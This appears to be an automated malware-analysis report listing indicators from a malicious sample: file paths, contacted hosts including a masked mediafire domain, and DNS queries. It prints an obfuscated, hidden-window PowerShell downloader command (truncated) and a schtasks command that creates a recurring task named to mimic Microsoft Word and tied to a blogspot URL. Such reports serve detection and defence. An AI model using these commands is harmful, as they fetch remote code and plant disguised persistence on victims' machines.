Technical Information
- <SYSTEM32>\tasks\micrsoword
- 'me###fire.com':443
- 'microsoft.com':80
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
- 'me###fire.com':443
- 'do######2343.mediafire.com':443
- DNS ASK me###fire.com
- DNS ASK microsoft.com
- DNS ASK do######2343.mediafire.com
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'...' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 63 /tn micrsoWord /F /tr """%ALLUSERSPROFILE%\milon.com""""""https://p11kjdfkdj.blogspot.com/atom.xml"""' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+'l'...
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 63 /tn micrsoWord /F /tr """%ALLUSERSPROFILE%\milon.com""""""https://p11kjdfkdj.blogspot.com/atom.xml"""